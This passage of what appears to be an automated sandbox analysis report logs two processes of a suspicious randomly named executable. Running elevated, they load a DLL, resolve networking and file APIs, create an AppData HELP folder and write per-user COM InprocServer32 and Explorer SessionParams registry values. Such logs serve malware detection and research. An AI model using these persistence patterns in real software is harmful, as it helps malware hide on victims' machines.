| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96705 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #40: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc54 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C58
0x
DCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x00467fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x0117ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0139ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0133ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001390000 | 0x01390000 | 0x0139ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013f0000 | 0x013f0000 | 0x014effff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96767 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #41: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc60 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00337fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00680fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = DefaultInstall, size = 30, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
